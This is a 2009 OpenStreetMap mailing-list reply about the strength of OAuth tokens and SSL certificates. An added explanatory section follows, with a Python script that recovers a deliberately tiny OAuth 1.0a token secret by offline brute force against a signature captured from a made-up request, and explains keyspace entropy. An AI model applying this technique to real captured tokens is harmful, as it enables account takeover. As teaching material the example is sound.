[OSM-talk] Why doesn't OSM implement a simple measure to protect its users and passwords?
John Smith
deltafoxtrot256 at gmail.com
Sat Dec 26 03:40:26 GMT 2009
2009/12/26 Matt Amos <zerebubuth at gmail.com>:
> it seems that SSL isn't being left alone.
I'm not in the UK so I can't test it. Can anyone confirm this is
actually happening?
> given sufficiently many signatures, it's possible to brute force a
> single token with a very large amount of effort. however, this token
> doesn't give sufficient access to either create further tokens or
Let's put things into perspective here: what bit size do most OAuth
keys (or the tokens) use? Unless it's up around 2048 bits, it
potentially could be done on some of the GPU number-crunching systems
that are about in a smallish amount of time. It depends on the reward,
actually, as to how much effort someone will put into breaking
something.
> change users credentials and can be easily revoked. it's also worth
> noting that it's possible to brute force SSL certificates, but again,
Yes, but to date only 56-bit RSA has been broken, although that doesn't
mean something much larger can't be broken. But if it was feasible,
there are still a couple of 1024-bit RSA certs in older browsers, and
2048-bit in most current browsers, that haven't been broken. I'm actually
surprised some of the older RSA keys haven't been cracked to issue
valid SSL certs for scammers, but they generally don't need SSL to
commit fraud against people that hand out their personal information
willy-nilly.
> with a very large amount of effort. in general, it's possible to brute
> force everything except one-time pads.
I like these for giving to remote hands...
> as with any security measure, to minimise your risk you need to be
> aware of the security horizon (which will depend on what your attack
> profile is) and change your authentication details regularly.
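The attack Matt describes above (recovering a token's secret offline from captured signatures) and John's question about what "bit size" means for an OAuth token, worked through as an added example. This is not code from the original thread or from the OSM code base. It assumes OAuth 1.0a's HMAC-SHA1 signing (the consumer secret and token secret joined with "&" form the HMAC key), a constructed request to a made-up URL with made-up credentials, that the attacker already knows the consumer secret (as when it ships inside a distributed client application), and a deliberately tiny token secret of three lowercase letters so the search finishes instantly. The strength of such a token is the entropy of the secret, not an RSA-style modulus size: 26^3 candidates is about 14 bits, while 32 characters drawn from a 64-symbol alphabet is 192 bits.

```python
import base64
import hashlib
import hmac
import itertools
import math
import string
from urllib.parse import quote


def pct(s: str) -> str:
    """RFC 5849 percent-encoding: only unreserved characters are left literal."""
    return quote(s, safe="-._~")


def signature_base_string(method: str, url: str, params: dict) -> str:
    """Build the OAuth 1.0a signature base string: METHOD&URL&normalized-params."""
    normalized = "&".join(f"{pct(k)}={pct(v)}" for k, v in sorted(params.items()))
    return "&".join([method.upper(), pct(url), pct(normalized)])


def hmac_sha1_signature(base: str, consumer_secret: str, token_secret: str) -> str:
    """HMAC-SHA1 over the base string, keyed with 'consumer_secret&token_secret'."""
    key = f"{pct(consumer_secret)}&{pct(token_secret)}".encode()
    mac = hmac.new(key, base.encode(), hashlib.sha1).digest()
    return base64.b64encode(mac).decode()


# Constructed sample request: made-up URL and credentials, not real OSM data.
CONSUMER_SECRET = "demo-consumer-secret"   # assumed known to the attacker
TOKEN_SECRET = "bad"                       # deliberately tiny: 3 lowercase letters
REQUEST = (
    "GET",
    "https://api.example/v1/user/details",
    {
        "oauth_consumer_key": "demo-consumer-key",
        "oauth_token": "demo-access-token",
        "oauth_nonce": "n0nc3x",
        "oauth_timestamp": "1261799426",
        "oauth_signature_method": "HMAC-SHA1",
        "oauth_version": "1.0",
    },
)


def captured_exchange():
    """What a passive observer of one unencrypted request sees: base string and signature.

    The signed parameters travel in the clear; only the token secret is hidden.
    """
    method, url, params = REQUEST
    base = signature_base_string(method, url, params)
    return base, hmac_sha1_signature(base, CONSUMER_SECRET, TOKEN_SECRET)


def brute_force_token_secret(base, signature, consumer_secret, alphabet, length):
    """Offline search over every candidate secret of the given alphabet and length.

    Returns (recovered_secret, attempts), or (None, attempts) if the space is exhausted.
    """
    attempts = 0
    for cand in itertools.product(alphabet, repeat=length):
        attempts += 1
        guess = "".join(cand)
        if hmac_sha1_signature(base, consumer_secret, guess) == signature:
            return guess, attempts
    return None, attempts


def keyspace_bits(alphabet_size: int, length: int) -> float:
    """Entropy in bits of a uniformly random secret with alphabet_size**length values."""
    return length * math.log2(alphabet_size)


def demo():
    """Recover the constructed token secret from one captured signature."""
    base, sig = captured_exchange()
    return brute_force_token_secret(
        base, sig, CONSUMER_SECRET, string.ascii_lowercase, len(TOKEN_SECRET))


if __name__ == "__main__":
    recovered, attempts = demo()
    print(f"recovered token secret {recovered!r} after {attempts} guesses")
    print(f"3 lowercase letters: {keyspace_bits(26, 3):.1f} bits")
    print(f"32 url-safe chars:   {keyspace_bits(64, 32):.1f} bits")
```

A single captured signature is enough for the search, since every guess can be checked offline at HMAC-SHA1 speed; the cost is 2^(entropy of the secret) HMAC computations, which is why the secret's length and randomness, not a certificate-style key size, decide how long such a token survives, and why being able to revoke and rotate tokens matters.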